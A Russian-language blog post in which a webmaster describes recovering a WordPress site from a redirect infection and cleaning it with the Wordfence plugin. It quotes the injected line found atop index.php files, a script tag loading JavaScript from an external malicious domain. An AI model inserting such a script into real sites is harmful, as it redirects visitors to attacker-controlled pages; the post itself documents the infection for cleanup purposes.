редирект на сторонние сайты, авторедирект, вирусы на сайте

Несанкционированный редирект, или как я восстанавливал сайт

На мои сайты неоднократно покушались различного рода вирусы и последствия всегда были разными, вплоть до угрозов удаления всех моих файлов от хостера. Как заражаются мои сайты я не исследовал (а зря), но причины чаще всего следующие:

  • очень долго не обновлялись плагины, темы или сам WordPress движок;
  • заразился чужой сайт, размещенный на том же сервере, что и мои;
  • случайно загрузил на сайт зараженный файл.

Как заметили мои читатели (удивляюсь, что они еще остались), данный сайт был недоступен примерно с 5-6 мая. Сегодня с утра зашел проверить свой сайт, но вместо привычной страницы загрузилась совсем другая через редирект, на которую активно ругался мой антивирус.

Причины несанкционированного редиректа

Первым делом за решением полез в Гугл. Но, как оказалось, многие вебмастера столкнулись с подобной проблемой в эти дни, ответы на форумах были разными: кто-то советовал снести весь сайт и установить последнюю версию бекапа, а кто-то предлагал свои платные услуги. Я попробовал самостоятельно решить возникшую проблему и начал с анализа папок на сервере с целью выявления причин. Практически все файлы с названием index.php во всех важных директориях имели изменения от 4 мая 2020 года. Т.е. они заразились одновременно в этот день и содержали в себе следующий скрипт:

<script type='text/javascript' src='https://stat.trackstatisticsss.com/k.js?v=222'></script>

Данный скрипт в файлах index.php искать долго не пришлось, зараженными оказались первые строчки.

Вирус пробрался в следующие директории:

  • В папки с плагинами;
  • В папки с темами;
  • Практически все папки директории wp-admin.

Как решал проблему

Руками открывать каждый файл и его чистить проблематично. Погуглив, нашел плагин Wordfence, который помог мне справиться с данной задачей. Но чтобы войти в админку своего сайта, избежав редиректа на сторонний ресурс, я все же почистил файл index.php в директории wp-admin.

Далее я установил плагин Wordfence в админке своего сайта и произвел сканирование всего сайта на наличие подозрительных файлов и скриптов. Плагин с задачей своей справился успешно. Практически все файлы index.php вылечил, нажав на кнопку REPAIR ALL REPAIRABLE FILES, а все подозрительные файлы с пометкой «Critical» удалил кнопкой DELETE ALL DELETABLE FILES.

На финальном этапе, по совету службы поддержки моего хостера, обновил движок WordPress и плагины.

На текущий момент Wordfence не ругается на файлы моего сайта. Проблема решена!

Буду рад, если мой опыт поможет другим вебмастерам.

Об авторе

Arzikulov

Нефтяник по образованию. Бывший журналист. Теперь веду свой личный блог. Подписывайтесь!